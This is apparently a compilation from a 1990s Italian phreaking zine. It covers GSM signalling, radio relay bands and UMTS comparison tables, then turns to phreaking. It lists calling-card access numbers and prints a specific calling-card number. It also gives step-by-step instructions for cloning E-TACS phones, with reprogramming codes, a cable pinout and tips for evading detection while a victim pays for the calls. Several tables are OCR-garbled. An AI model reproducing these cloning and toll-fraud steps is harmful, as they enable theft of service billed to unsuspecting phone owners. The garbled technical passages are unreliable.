7- telefono nello stato di idle 

RELEASE RICHIESTA DA BTS (chiamato che chiude) 

1- il telefono e' in conversazione (dedicated mode) 

2- DOWN messaggio di disconnect dalla BTS 

3-. UP messaggio di release 

4- DOWN release completata dalla BTS 

5- DOWN viene inviato comando di channel release 

6- UP il telefono conferma abbandono di canale (disconnect) 

7- telefono nello stato di idle 
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I ponti radio utilizzati per trasmettere fasci di canali telefonici per giunzione tra centrali interurbane sono di 
due tipi: 


- analogici: convogliano con modulazione SS-FM (single sideband a modulazione di frequenza) piu' fasci 
di canali (normalmente l'untia' di misura e' il supergruppo pari a 60 canali telefonici) multiplati a 
divisione di frequenza. 

- digitali: convogliano con modulazione normalmente QAM (come i modem) fasci di canali telefonici 
multiplati secondo la gererarchia plesiocrona (parola difficile che significa con sincronismo asservito ad 
un orologio master) tipica della multiplazione PCM. 

Bande di frequenza standardizzate CCIR e CCITT ed assegnate al Gestore pubblico in Italia: 

Ponti Radio Analogici 

1350 - 1650 MHz utilizzata da ponti radio di piccola capacita' (4 supergruppi) negli anni passati da ASST ora 

confluita in TI. Utilizzata anche dalla RAI per iponti di trasfimento dei canali audio e musicali tra le varie sedi 

regionali. 


1700 - 2300 MHz dovrebbe essere ormai completamente smantellata, era usata per ponti di piccola capacita' 
(1 supergruppo) da SIP e RAI. 


3600 - 4200 MHz utilizzata dalla rete primaria nazionale con fasci radio ciascuno da 16 supergruppi. 

5925 - 6450 MHz ponti radio a grandissima capacita' da 45 supergruppi utilizzato solo dalla ex-ASST ora TI. 
6575 - 7125 MHz per tratte comuni a piu' direzioni normalmente sooporta fasci radio a 5 supergruppi. 

7125 - 7445 MHZ riservata negli anni passati a SIP per la rete secondaria. 

7445 - 7750 MHz come sopra. 

10700 - 11700 a disposizione ma non utilizzata. 

Ponti Radio Digitali 


gamma 7 GHz modulazione QAM con costellazione a 64 punti usato per fasci 140 Mbit/sec e piu' raramente 
per fasci a 70 Mbit/sec 


gamma 11 GHz modulazione QAM con costellazione a 16 punti usato anche questo per fasci a 140 Mbit/sec 
gamma 13 GHz modulazione PSK a 4 fasi per fasci a 8 o 34 Mbit/sec 
gamma 18 GHz modulazione PSK a 2 fasi per fasci a 2 o 8 Mbit/sec 


I ponti radio normalmente devono poter avere visibilita' ottica e di conseguenza le tratte non possono 
coprire grandi distanze. Mediamente vengono ripetuti ogni 50/60 Km e quindi una dorsale nazionale da nord 
a sud comporta la costruzione di molte stazioni ripetitrici. 

La saturazione delle gamme di frequenza, l'accresciuta richiesta di bande trasmissive ed in notevoli progressi 
nel campo della fibra ottica ha reso i ponti radio piu' costosi e meno affidabili dei sistemi in fibra che stanno 
progressivvamente sostituendo le dorsali primarie. I canali su ponte radio presentano qualita' inferiore 
rispetto a canali in cavo o in fibra ottica. 
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Evoluzione dei sistemi mobili UMTS: Che cosa e'? 


UTMS: Universal Mobile Telecommunication System, portera' l'utente delle telecomunicazioni nella nuova 
societa' dell'informazione. Portera' informazioni, disegni e grafici direttamente alla gente e fornira' l'accesso 
alla prossima generaziona basata sui servizi d'informazione. 

Muovera' le comunicazioni mobili e personali verso i sistemi di seconda generazione che gia' stanno portando 
masse di mercato verso servizi a basso costo. 


Prospettiva ideale 
A medio/lungo termine UTMS dovrebbe unificare, integrandoli, i diversi sistemi esistenti con un'unica 
interfaccia radio che consenta l'accesso a reti diverse, pubbliche o private, attraverso un unico terminale. 


Prospettiva realistica 

Visione orientata al mercato. Continuita' con l'attuale tendenza che prevede lo sviluppo di sistemi non 
necessariamente unificati a livello di interfaccia radio, ma ritagliati sulle esigenze specifiche dei diversi livelli 
di utenza 


Il sistema UMTS 

e Servizi voce e dati per utenti mobili in qualunque tipo di ambiente (indoor outdoor, urbano/rurale); con 
le stesse potenzialita', in termini di servizio e penetrazione di mercato, offerte dai sistemi attuali. 

Ampio spettro di servizi offerti con velocita' fino a 2Mb/s, anche in ambienti ad alta densita' di traffico. 
Servizi a bit-rate variabile con alto grado di flessibilita". 

Estesa varieta' di terminali: dal personal communicator alle workstation mobili. 

Ambiente multi-operatore e con copertura mista (macro, micro e pico celle) per garantire il servizio ad 
utenti con caratteristiche di mobilita' e di traffico diverse. 

e Roaming nazionale, internazionale e globale. 


Migrazione verso UMTS 


MOBTTIEBX |=--=u=s-on0-uco cola + pacchetto dati ------------ 


TACS/GSM/DCS |------------------------------------------- > UMTS 
"n +--------------- > 
re | +> 
circuito globale ad alta | densita' |\----------- 

CT2/DECT |--------------------------- + | 
= 
= | 
distributivo | 


ERMES |--------------------- + 
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Migrazione verso UMTS: Protocolli radio 


GSM 

canali di segnalazione associati a velocita' fissa. 

capacita' del canale di traffico ridotta in modo non controllato a causa di segnalazione "fast". 
nessuna possibilita' di connessioni "multiple bearer" o asimmetriche. 

corrispondenza biunivoca tra chiamata e connessione. 

gestione delle risorse radio a livello 3. 


DECT 
e canali di segnalazione associati a velocita' fissa. 


e capacita' del canale di traffico ridotta in modo prefissato. 
e separazione tra controllo e dati d'utente. 

e separazione tra chiamata e connessione. 

e gestione delle risorse audio a livello 2. 

UMTS 


e canali di seganalazione associati a velocita' variabile. 


e capacita' del canale di traffico non ridotta (o ridotta in modo controllato) a causa della segnalazione. 
e separazione tra controllo e dati d'utente. 
e separazione tra chiamata e connessione. 
e gestione delle risorse radio a livello 2. 
Migrazione verso UMTS: Handover 
GSM 
e Mobile assisted. 
e Backward handover. 
e Hard handover. 
e Handovertra entita' di rete per mantenere la continuita' della conversazione. 
DECT 


Mobile controlled. 

e Forward handover. 

e Seamless handover. 

e Handovertra livelli di protocollo per mantenere la continuita' della conversazione. 


UMTS 
e Network managed: 
e Networkevaluated. 
e Mobile evaluated. 
Forward/backward handover. 
Soft handover + microdiverity. 
e Seamless handover per mantenere la continuita' e migliorare la qualita' della conversazione. 


Migrazione verso UMTS: Servizi dati 


GSM 

servizi dati solo simmetrici 

velocita' fino a 9.6 kb/s 

una sola connessione per ogni chiamata 
chiamate multiple su connessioni indipendenti 
variazione lenta della velocita' 
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DECT 


servizi dati simmetrici e asimmetrici 


e velocita' fino a 384 kb/s (oltre 730 kb/s unidirezionali teorici) 
e connessioni multiple 
e chiamate multiple con connessioni condivise 
e variazione lenta della velocita' 
UMTS 
e servizi simmetrici e asimmetrici 
e velocita' fino a 2Mb/s 
e connessioni multiple con connessioni condivise 
e variazione veloce della velocita' 
Migrazione verso UMTS: Servizi dati a velocita' variabile 
GSM 
e variazione solo da parte dell'utente (o del terminale) 
e variazione all'interno della singola connessione 
e variazione lenta 
e nessun impatto sulla disponibilita' delle risorse radio 
DECT 
e variazione da parte del sistema e dell'utente 
e variazione all'interno della singola connessione con instaurazione/rilascio di bearers piu' modificata della 
larghezza di banda 
variazione lenta 
impatto sulla disponibilita' delle risorse radio solo nel caso di instaurazione/rilascio dei bearers 
UMTS 


variazione da parte dell'utente e del sistema 

variazione all'interno della singola connessione con instaurazione/rilascio di bearers piu' modificata della 
larghezza di banda 

variazione veloce (frame by frame) 

impatto sulla disponibilita' delle risorse radio 


Il sistema 


GSM 


Confronto tra i sistemi cellulari GSM900/DCS1800 ed il sistema CTM basato su DECT/ISDN/IN 


Capacita' traffico 


Ambienti applicazione 


ma 


Mobilita' e Handover 


Qualita' fonia 
Grado di servizio 
Ritardo trasmissione 


Accessibilita' al 
servizio 

Mobilita' e localizza 
zione 

Handover 


Servizio indoor 
privato 


Sicurezza/ 
Condifenzialita' 


GSM900 DCS1800 
| 900 Mhz | 1.8 RZ 
RGNDE TOMA/EDD 
| 25 +25M82 | 75 #75Mb2 
pazasta 
| & £ali rate | è culi rate 
16 hlaf rate 16 half rate 


PLMN cellulare (overlay network 


13 Kb/s (full rate) 


Rurali, extraurbani, 
urbani con bassa densita" 
traffico 


periferici 
di 


Sistema cellulare di alta poten 


za; per applicazioni High Tier 
Totale | Totale in aree 
| metropolitane 

Outdoor 


A velocita' veicolare 


Accesso a tutti i servizi 
compatibilmente con gli accordi 
tra gli operatori 


Su tutta l'area di servizio 
limitato dalla copertura radio 


Fino a 250 Km/h 
Non seamless; intra e intercell 


12 full slot 

24 half slot 

Non necessita di pianifi 
cazione;Dynamic Channel 
Allocation/Selection 
(DCA/DCS) 


PSTN/ISDN/IN 
network) 


(integrated 


Aree densamente popolate 
commerciali, uffici, 
indoor in genere. 

Aree con alta densita! 
di traffico 

Sistema cordless di 
bassa potenza ed alta 
capacita'; per 
applicazioni Low 
Aree geografiche 
circoscritte 


A velocita' pedonale 


Alta, 
> 99% 
basso (<10ms) 


come rete fissa 


Accesso a tutti i servi 
zi consentiti dal tipo 
di abbonamento (profilo 
d'utente) 

Aree domestiche,business 
e pubbliche (limitato da 
copertura radio 

Fino a 20Km/h 

Seamless, intra e inter 
cell 

Possibile con copertura 
radio indoor 


Autenticazazione, 
cifratura 
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GSM900 | DCS1800 DECT 
Servizi supplementari Si Si 
Servizi a valore Si Si 
aggiunto 
Costo abbonamento Normalmente alto Allineato a PSTN/ISDN 
Struttura tariffe Normalmente alta Allineata a PSTN/ISDN 
Regionale (da approvare) con maggiore flessibili 
Nazionale ta' sulle condizioni di 
Internazionale tariffazione 
Terminale 
Prestazione terminal: 
Menu driven Tramite display Tramite display ed 
annunci registarti 
Adattatore FAX,PC,PAD| Si, opzionale Si, opzionale 
Lettore Smart Cart Si (SIM e micro-SIM) DAM disponibile a beve 
Peso 290° gr | 250 gr <200gr 
Potenza Tx 0.8-20W | 0.25-1W 0.08-0.25W 
Dimensioni come TACS 150:-x..500x 20 
Costo (obiettivo) 300/500 ECU 100/200 ECU 


Se qualcuno ha ulteriori curiosita' domandate pure... in mail! 
Cya... 


Nick1 
SPP Group 


Le calling cards piu' usate sono solitamente quelledi : 


AT&T (American Telephone & Telegraph) 
MCI (adesso Worldphone) 
US SPRINT (adesso GLOBAL ONE). 


Dall'Italia i numeri gratuiti per accedere ai centralini automatici delle suddette sono : 


AT&T (1721-011) 
MCI (1721-022) 
US SPRINT (1721-877) 


tutte e tre i servizi richiedono l'inserimento del numero da chiamare (che per at&t e mci 
puo' 

essere o un numero statunitense nella forma acn-phone (es: 617-258-7111) o un numero 
internazionale nella forma 011-cc-phone o 00-cc-phone (es:011-39-2-4040401, 00-39-2- 
4040401 Milano) e della calling card (che per tutte e tre le compagnie e' di 14 cifre XXX- 
VKKIKAKAKMKKAKA]. 

Nella golden age italiana (prima del '93) erano usatissime le AT&T CC, con il solo 
problema che 

all'epoca i sistemi automatici non c'erano e dovevi parlare in americano stretto con una 
operatrice (frase divenuta famosa : AT&T, May I Help you ? per MCI : MCI upreader 543, 
How can I Help you ?, chissà se saranno rimaste uguali (nel senso che le frasi di risposta 
sono definite dalla politica aziendale) e che non potevi chiamare al di fuori degli USA.. a 
meno di non chiamare con la CC un PBX o PABX in USA e da quello richiamare dove 
volevi anche le Allied Teleconferencing col quale si facevano conference notturne in 7-8 
di durata oceanica... 

(10288-0700-456-1000 il numero dell'alliance se mi ricordo bene e se non e' variato..) 

Vi anticipo che NON esistono algoritmi per calcolare le AT&T CC.. le private sono 
composte dal numero dell'abbonato + 4 cifre di codice rilasciate a caso da un calcolatore 
at&t .. le aziendali sono composte da 10 cifre algoritmiche (l'algo e' sconosciuto) + 4 a 
caso... Vi lascio per la storia la piu' bella at&t che abbia mai visto.. l'avevamo solo in due 
e duro' 30 giorni (la media di funzionamento prima che una carta venisse bloccata era di 
2-3 giorni nel 1992): 

212-433-5421-6214 


3.9 Giocare via modem gratis e altro 
di CDP 


Allora, premetto che questo metodo non l'ho provato ma dovrebbe funzionare al 100%. 
Avete presente quei numeri verdi ai quali è possibile telefonare per sottoscrivere un 
abbonamento a TIN e ci si naviga come si fosse in Internet (anche se si rimane sempre 
sul server?). Ebbene quando vi collegate vi viene dato un indirizzo IP... 

Quindi se un vostro amico si collega allo stesso numero e stesso server può collegarsi 
con voi tramite il vostro indirizzo IP! 

Potrete così giocare a tutti i giochi che supportano il multiplayer via internet!! 

Il problema semmai è come dare il proprio IP agli amici, che so, fate voi... piccioni 
viaggiatori, CB, telefonino... sbizzarritevi! 

Se volete provare subito vi dò questo green: 

167012837 

(Questo è quello che trovate alla risposta di Internet gratis, seguendo quel metodo ne 
potreste trovare altri) 

Vi ci collegate con accesso remoto e alla schermata del terminale (a connessione 
effettuata) digitate: 

ppp d 

e vi viene dato un IP address. 

Se non avete voglia di giocare potete lanciare il browser e collegarvi a www.tin.it e farvi 
quattro risate. 


Sezione 4: Telefonia cellulare. 


4.1 Introduzione 


Il settore del cellular phreaking è sicuramente uno dei più evoluti e uno di quelli che hanno fatto 
girare più soldi tra i truffatori. Sfortunatamente chi scopre nuove cose è colui che lo fa per lucro 
e le informazioni sono difficilissime da scoprire. Noi di Spaghetti andiamo cercando da tempo 
qualcuno che sia parecchio esperto nel settore per aiutarci a sviluppare questa sezione. 


4.2 Cellulari e clonazione Etacs 


Estratto da Butchered From Inside n° 2 

In coerenza con lo stile di pIGpEN e per mancanza di idee :) 

Autore: |PazzO]| 

Consumo: 20 ore di sonno + o -, 3 cellulari bruciati (scherzo), 1 rotolo di 
carta igienica (raffreddore) 

Rompimenti di coglioni: 2 Telefonate, Citofono, Cellulare, Mia madre, mia 
sorella!! GRRRRRRRRRR 

Musica Ascoltata: (accendo la radio e scrivo a caso) OasiS a manetta!!!! 
Dedica: A Micaela perche' anche se non la conosco (ma chi e' questa tizia lo 
sapro' mai?) ha un server talmente impenetrabile che sta facendo uscire 
pazzi tutti gli hackers (o lovers) di SOftPj 

Subject: Cellulari and related (Almeno questo era l'intento prima di scrivere 
l'articolo) 

Parte: Prima e Seconda 


Premetto che se non ve ne fotte un caxxo di come funzionano i cellulari, di 
cosa sono e perche' ci sono 3 diversi sistemi, di cosa usate per telefonare e 
di come lo fate, ma vi interessa solo chiamare gratis allora o siete dei Lamah 
o siete degli impazienti di quelli che aprono 300 finestre di NETscape fino a 
fare impallare tutto come me, in quest'ultimo caso jumpate direttamente alla 
seconda parte dell'articolo, anche se vi consiglio di leggerlo attentamente 
perche' e' molto interessante (almeno credo). 


La domanda che in generale affolla la mente di tutti i Phreakers d'Italia, ma 
soprattutto la mente dei miei quando pagano la bolletta del telefono e' "Ma si 
puo' telefonare gratis in qualche modo tipo alzo la cornetta sto 4 ore 
attakkato e non pago un caxx0????". 

Beh vi anticipo che alla fine del mio piccolo/grande articolo voi riuscirete 
tranquillamente a chiamare gratis* ovunque voi crediate. *(per il significato 
del termine Gratis vai piu' avanti). 


Voglio premettere che tutto cio' che scrivo e' a scopo PURAMENTE INFORMATIVO ED 
EDUCATIVO e che e' proibito dalla legge del nostro stato manipolare telefoni 
cellulari a danno altrui o della Telecom Italia Mobile per trarne vantaggi. Non 
sono dunque responsabile per atti criminali dovuti al cattivo uso di queste 
informazioni e non mi ritengo nemmeno responsabile per danni causati a telefoni 
cellulari E-Tacs o GSM dal cattivo funzionamento di codici o altro contenuto 

in questo articolo. Non prendetevela con me quindi se il vostro cellulare 

smette di funzionare o fonde inspiegabilmente, anche perche' e' molto 

difficile per un inesperto manipolare il Firmware di un telefono non 
compromettendolo definitivamente. Ah, dimenticavo, se vi arrestano per aver 
clonato 1,10,100 cellulari io non rispondo delle vostre azioni criminali. 

Questo articolo e' scritto per i possessori di cellulari in modo da 

consentire di proteggersi da eventuali clonatori. 


Innanzi tutto devo fare una precisazione sul termine Gratis. Molti intendono 
per telefonare gratis il telefonare senza pagare una lira, beh sarete sorpresi 


dal fatto che non e' cosi'. Esiste una sottile differenza tra il chiamare 

gratis e il chiamare a spese altrui. Nel primo caso la mia chiamata non la paga 
nessuno poiche' non viene addebbitata dalla TIM, mentre nel secondo caso la mia 
chiamata viene addebbitata a un povero disgraziato al quale avremo clonato la 
sim o il cellulare, quindi state attenti poiche' queste info in campo di Cell 

Ph oggi permettono solo di telefonare a spese altrui e non gratis, ma penso che 
per voi non faccia poi grande differenza. ;-)) 


Iniziamo ora la parte veramente interessante con dei cenni preliminari sui 
sistemi cellulari oggi in uso. 

Esistono due sistemi di cellulari attualmente in uso in Italia e un terzo in 

uso nel mondo intero, cioe' un sistema analogico e due sistemi digitali. 

Il primo, in Italia, e' definito sistema E-TACS ed e' attualmente quello che 
garantisce la maggior copertura sul territorio nazionale sia a livello di linee 
disponibili sia a livello di antenne impiantate. 

Il sistema E-tacs si basa su una tecnologia di prima generazione ovvero 
analogica. Il cellulare agganciato alla rete infatti non tramuta le 

informazioni in formato digitale ma le trasmette così' come le riceve dal 
microfono o dalla tastiera all'antenna che le smista alla centrale sino alla 

rete Telecom. 

Questo sistema antiquato ci permette oggi di ascoltare con un semplice scanner 
le conversazioni altrui senza poter essere scoperti da nessuno e senza 
disturbare o interrompere la linea (per freqs e info vedi: BFI n.1 

"Radioascolto per veri ascoltoni",Vanadio). 

In pratica il cellulare possiede un numero di identificazione che viene fatto 
coincidere con il Serial Number, grazie al quale si registra sull'antenna che 
inoltra la chiamata. In pratica quando noi premiamo il tasto invio del nostro 
telefono esso dialoga per 2-3 secondi con l'antenna che lo sta servendo, 
trasmettendogli il suo numero di identificazione associato al numero del 
chiamante; intanto l'antenna dialoga (questa volta via cavo) con la centrale 
telefonica, la quale controlla se l'utente e' abilitato a chiamare -del tipo: 

se ha pagato la bolletta. ;-) 

E dopo aver ricevuto la conferma attende che il cellulare le trasmetta il 
numero da chiamare, il cellulare ricevuto l'ok trasmette il numero e si 
connette alla rete telefonica ed effettua la chiamata (voglio ricordare che la 
prima parte del processo si ripete ogni volta che il cellulare passa da ricerca 
campo a campo per consentire la ricezione delle chiamate con un grande 
dispendio di energia). 

E allora come faccio a fottere questo sistema? 

Bisogna dire che i cellulari nascono di fabbrica senza nessun contratto o 
registrazione ma gia' con un numero seriale: e chi li attiva? 

Ma i nostri amiconi della Telecom, naturalmente, che posseggono tutti i codici 
di riprogrammazione di telefoni cellulari e che prendono per fare questo 
L.500.000 di attivazione (mocc a'loro). 

Ma se lo fanno loro che sono stati assunti per raccomandazioni e che non 
distinguono un pc da un televisore, perche' io non dovrei farlo? 

L'unico modo per fregare quindi l'antenna (che io sappia) e' simulare che il 
nostro cellulare sia un untente abilitato e per fare questo bisogna inserire il 
codice ed il numero di qualcun altro. Su questo torneremo dopo... (ehehe sono 
sadico!!) 

Il sistema E-tacs si e' rivelato di scarsa sicurezza e bassa qualita' 

facilitando l'introduzione del nuovo standard europeo per la telefonia digitale 
che e' rappresentato dal GSM ovvero Global Mobile System. 

Il passaggio dall'analogico al digitale e' dunque tutt'ora in corso e si 
completera' entro il 2000. Ma le differenze tra analogico e digitale quali 

sono dunque? Beh a tutti quelli che mi fanno questa domanda io faccio questo 
esempio: pensate ad un giradischi vecchio modello e ad un lettore cd, il primo 
legge dai dischi direttamente la musica incisa e ha il compito di amplificarla 
tramite la testina che trasforma le incisioni in suono e tramite 

l'amplificatore, il secondo invece ha il compito di trasformare le informazioni 
COMPRESSE nel formato digitale in suoni e poi di amplificarle garantendo quindi 
il passaggio di informazioni di qualita' maggiore in un minor spazio e in 


formato digitale. 

Oggi il sistema digitale consente una sicurezza maggiore grazie al sistema 
nuovo di autenticazione (del quale parlero' dopo), un risparmio di energia 
grazie alla nuova tecnologia dei cellulari, una qualita' quasi perfetta di 
trasmissione (almeno in teoria) grazie al flusso di dati, la possibilita' di 
utilizzare piu' apparecchi con lo stesso codice sfruttando la mobilita' della 
SIM CARD (il cuore del telefono) e infine il nuovo servizio di roaming per 
collegarsi sulle reti di piu' gestori sparsi sul Globo. Piu' propriamente il 
sistema GSM e' nato per la trasmissine DATI applicata alla telefonia, quindi 
per quanto possa sembrare paradossale la funzione di trasferimento dati audio 
(Telefono) e' da considerarsi una funzione accessoria di quello che e' il piu' 
potente sistema di trasmissione dati via etere al mondo. 

Ma come funziona in pratica il sistema GSM? 

Il sistema Gsm si basa sulla trasmissione dati su una determinata frequenza 
radio assegnata dal governo al Gestore (colui il quale si prende l'onere di 
costruire le antenne e di vendere l'abbonamento a prezzi concorrenziali -vedi 
TIM o OMNITEL-). L'apparecchio GSM oggi disponibile in numerose Marche, 
modelli, dimensioni e capacita' diventa quindi Universale grazie alla SIMcard, 
che e' la tessera che contiene le informazioni relative al contratto 
dell'abbonato (algoritmo di idefinticazione) e dati relativi alle impostazioni 

del cellulare, numero di telefono etc (Seguira' presto una DETTAGLIATA 
spiegazione del funzionamento della SIM CARD e della sua composizione 
FONDAMENTALE per poter riprodurne una"in casa"). 

Il sistema GSM e' inpenetrabile in fase di "identificazione" con l'antenna 
grazie all'algoritmo di identificazione che viene assegnato al Gestore il quale 
a sua volta lo usa per produrre le proprie schede SIM. Quando noi premiamo il 
tasto invio, questa volta il cellulare attende la trasmissione di un numero 
casuale a 128 bit che gli verra' fornito dal centro autenticazione contattato 
dall'antenna, il numero passa dal cellulare alla sim che lo passa attraverso le 
sue copie degli algoritmi A1,A8 e ki, formula la Risposta a 32 bit e la 
restituisce al network, lo stesso numero casuale viene di nuovo manipolato 
dall'algoritmo A8 e dal ki e forma la cyper key (la chiave) che viene inviata 

al network, il sistema di autenticazione controlla se le due chiavi sono state 
trattate con l'algoritmo A8 e ne estrae il ki (identificazione) controllandone 

la validita' e dando quindi il via libera alla transazione. 

Questo sistema garantisce che anche con la completa intercettazione dei dati 
non si possa risalire a nessuna informazione utile ai fini del Sim cloning. 

(Che ne dite e' sicuro o no questo sistema?) 

II Gsm quindi e' un sistema sicuro (o almeno questo si crede ;-), ma poi daremo 
un'okkiata a come riuscire a "fottere" questo sistema. 

Il terzo e ultimo sistema (che io conosca) e' il global satellitar system che 
adopera la tecnologia digitale utilizzando pero' come antenne di diffusione non 
le classiche celle ma i satelliti in orbita intorno al globo, garantendo una 
copertura TOTALE dell'intera terra, ma con costi altissimi di gestione e quindi 
di servizio. Non mi sono interessato granche' di questo servizio e non so fino 
a che punto ne valga la pena oggi visto che esistono pochissimi apparecchi in 
giro in grado di captare i segnali del satellite e quindi di usufruirne 

(esclusi i telefoni degli Aereoplani), ma comunque fregare questo sistema e' 
piu' facile di quanto si pensi (dopo vi svelero' il mio piccolo segreto!!). 


Fine della prima parte... 
SECONDA PARTE 


Se avete chiuso tutto le finestre e vi siete un po' tranquillizzati iniziamo 

con la seconda parte che tratta di E-Tacs Cloning. Ho gia' detto prima che non 

e' possibile clonare un qualsiasi cellulare E-Tacs poiche' non possediamo 

l'algo (penso) che genera i Serial Number ai produttori di cellulari i quali 

poi li notificano alla Telecom. 

Di conseguenza per poter clonarne uno dovrete possedere almeno un serial number 
di un cellulare ATTIVO (cioe' che ha un contratto o una Tim card ricaricabile 
ATTIVA) e il numero di telefono di quel cellulare. In pratica tutto quello che 


dovete fare e' prendere un cellulare, sollevare la batteria, leggere il Serial 
Number che in genere e' accompagnato da un codice a barre, leggere il modello 
preciso del cellulare e infine appuntarsi anche il numero di telefono di quel 
cellulare. 

Fatto questo, che e' la parte piu' difficile di tutto il processo ed e' anche 

quella che puo' causare piu' problemi dal punto di vista legale se non usate un 
vostro cellulare per questo esperimento, siete gia' al 50% del lavoro. 

I modelli di cellulari esistenti oggi sul mercato sono moltissimi e non posso 
elencarli tutti, quindi partiro' dai modelli piu' diffusi, in particolare con 

il modello Ericsson EH237 che e' stao il primo cellulare che io abbia mai 
clonato. 

Ora chiudetevi in una stanza soli, lontano da occhi indiscreti, portetevi una 
bella ragazza con voi (anche se non garantisco la riuscita del cloning in 
queste circostanze), oppure andate in Metropolitana o in P.zza Duomo a Milano, 
tanto nessuno notera' niente, e iniziate ad entrare nel "test mode" del vostro 
cellulare, cosi' potrete esplorare le funzioni nascoste e le opzioni impostate 
dal gestore telefonico della vostra zona. 

Per riuscire a modificare il software di un cellulare (il quale poi non e' 
nient'altro che una aaprom riprogrammabile) in alcuni casi basta possedere i 
codici di riprogrammazione, mentre in altri casi bisogna "costruire" un cavo 
per interfacciare il Telefono cellulare con il vostro Personal Computer, dal 
quale poi lanceremo un programma di programmazione cellulare che variera' da 
modello a modello, ma che avra' sostanzialmente le stesse funzioni, cioe' 
riprogrammazione NAM. 

Naturalmente il modo piu' semplice per riprogrammare un cellulare e' quello di 
utilizzare i codici di riprogrammazione segreti, ma spesso (soprattutto grazie 
ai nuovi sistemi di sicurezza degli stessi) diviene indispensabile costruire un 
cavo di interfaccia Parallelo-Piede del telefono armati di molta pazienza, cavi 
di rame, nastro isolante ed un paio di forbici. 

Ma rieccoci al nostro EH 237, per iniziare PROCURATEVELO ;-) ma in caso di 
impossibilita' seguite bene i passaggi che vi proporro'. Innanzitutto spegnete 
il cellulare, togliete ogni tipo di blocco e riaccendetelo. Subito dopo averlo 
riacceso digitate il codice di riprogrammazione esatto: 


FCN 923885 (or M 923885) 

" 924885 " 

" 904885 " 

"904005 " 

"904035 " 

" 904085 " 

FCN 904030 (il quale vi permettera' di clonare il cellulare 3 o 4 volte al 
massimo, quindi attenzione!!) 

FCN 900000 (il quale invece vi chiedera' ben cinque codici PIN per ora 
sconosciuti). 


Nota bene che il codice di riprogrammazione varia di cellulare in cellulare in 
base al software montato, per non avere problemi vi consiglio di provare prima 
i codici di riprogrammazione OGNUNO DA SOLO (spegnendo e riaccendendo il 
cellulare tra un codice ed un altro) UNO DOPO L'ALTRO (cioe' prima fcn 923885 
poi se non accade niente fcn 924885 e cosi' via sino ad arrivare alla fine 

della sequenza) sino a quando non si entrera' nel test secret mode del 
cellulare. 

Una volta inserito il codice si entra nel menu' del test mode che purtroppo 
varia non solo da modello a modello ma da software a software, per questo non 
troverete mai nulla di preciso su come sono strutturati i menu', ma potrete 

fare benissimo affidamento sulle vostre capacita' intuitive. Quello che dovrete 
fare e' in pratica riprogrammare il MIN ovvero i numero di identificazione 
(0337etc/0330etc), piu' precisamente entrare nel menu' del MIN, cancellare con 
il tasto C il vecchio e riscrivere il nuovo, riprogrammare il SN naturalmente 

con quello che ci siamo procurati, salvare le impostazioni e riavviare il 
cellulare. Fatto questo il vostro cellulare si dovrebbe comportare adesso come 
il cellulare che e' stato clonato, quindi dovrebbe squillare quando qualcuno fa 


quel numero e addebbitare la chiamata su quel numero, naturalmente senza che il 
leggittimo proprietario se ne accorga. Le uniche cose a cui dovrete prestare 
attenzione sono: 

1) non rispondere alle chiamate in entrata 

2) non abusare del cellulare, perche' se al malcapitato dovesse arrivare una 
bolletta esuberante egli non solo si farebbe disdire il contratto, ma la 
Telecom aprirebbe un'indagine utilizzando come indizi i numeri chiamati da 
quel telefono, con conseguente rapida gattabuia. 

E se quei codici non avessero funzionato? 

In tal caso useremo il nostro bel Pc per clonare il nostro cellulare dovendo 
pero' costruire un cavo che colleghi il cellulare alla porta parallela dello 
stesso PC. 

Ecco lo schema del cavo da costruire con relative istruzioni: 


Parte bassa del telefono vista con la tastiera verso l'alto: 


N TAVA\ 
00000000000000 
21 811 


Dove 21, 8 e 11 rappresentano i numeri dei pins della "male 25-way d-plug", 
ovvero porta parallela che connette la vostra stampante al PC, ai quali vanno 
connessi rispettivamente il terzultimo, il quartultimo e l'ottavo pin del 
cellulare. 

Naturalmente il modo piu' semplice di procurarsi un cavo del genere e' quello 
di trovare un vecchio caricatore oppure la presa accendisigari della macchina 
e modificarlo in modo da renderlo utile al nostro scopo, cioe' tagliando la 
presa accendisigari e collegando i tre cavi come segnato sopra da una parte e 
alla porta parallela al pin 21, 8 e 11 dall'altra. Per questo e' importante che 

il cavo che avrete scelto non sia uno stampato in plastica per quanto riguarda 
la presa, quelli cioe' che non si ossono modificare se non squagliandoli (come 
per es. quelli del PC), ma che sia un semplice cavo da telefono cellulare in 
modo da poter spostare i tre contatti dove ci interessa che siano. 

Spero di essere stato abbastanza chiaro a riguardo, cmq sembra molto piu' 
difficile di quanto non lo sia in realta', ipoteticamente potreste anche 
prendere 3 cavetti minuscoli e fargli fare contatto a mano sui pin giusti, 
magari saldandoceli per un attimo, e infirarli nei buchini della presa 

parallela, ma vi garantisco che il primo metodo e' il piu' efficace. 

Fatto questo lanciate il programma sul vostro pc, seguite le istruzioni e sara' 
facile come fumarsi un caxxone in un campo di Maxxxxana. 

Ci sono delle voci in giro che dicono che i telefoni ericsson hanno una 
sicurezza che li disattiva dopo 40 volte o meno e li rende inutilizzabili. 

Beh, io sono arrivato a vedere cellulari Ericsson riprogrammati per piu' di 30 
senza problemi, ma non si sa mai...... 

State attenti e seguite le mie istruzioni e tutto dovrebbe andare bene, in 
questo caso vai all'inizio dell'articolo e leggi cosa penso dell'abuso di 

queste informazioni a danno proprio o altrui. 

Nel prossimo numero tenteri' di fare altri 2 o 3 modelli tipo Motorola, Nec e 
altri, per ora mi interessava spiegarvi + o - di cosa si trattava. 

Per i GSM e' tutto un altro discorso, ci arrivero' presto, e' ancora piu' 
semplice, ma e' un po' teorico. 

A presto amici smanettoni di cellulari. 

Se ne sapete piu' di me o credete che abbia scritto qualcosa di sbagliato o 
volete collaborare con me per proseguire la scoperta del digitale contattatemi 
all'indirizzo e-mail SOftPj98@usa.net specificando che il msg e' destinato alla 
mia attenzione. 


|PazzO] [SOftPj98] 


4.3 La SIM Card 
di CDP 


Una SIM card è una Smart-card, quindi ha un processore capace di eseguire un algoritmo di 
criptamento oltre ad avere della memoria. | codici IMSI e KI non lasceranno mai la SIM Card. 


Il SIM (Subscriber Identity Modume) contiene: 


- Identità Mobile Internazionale dell'utente (IMSI) 

- Chiave di identificazione individuale 
dell'utente (Ki) 

- Algoritmo per la generazione di chiave cifrata (A3), 
con Ki e RAND genera una chiave a 64 bit (Kc) 

- Algoritmo di Verifica (A3), col Ki e RAND 
genera una risposta "firmata' a 32 bit (SRED) 

- Codice PIN utente (1 & 2) 

- Codice PUK (1 & 2), detto anche SPIN 

- Rubrica dell'utente 

- Messaggi SMS salvati 

- Lista delle reti preferite 


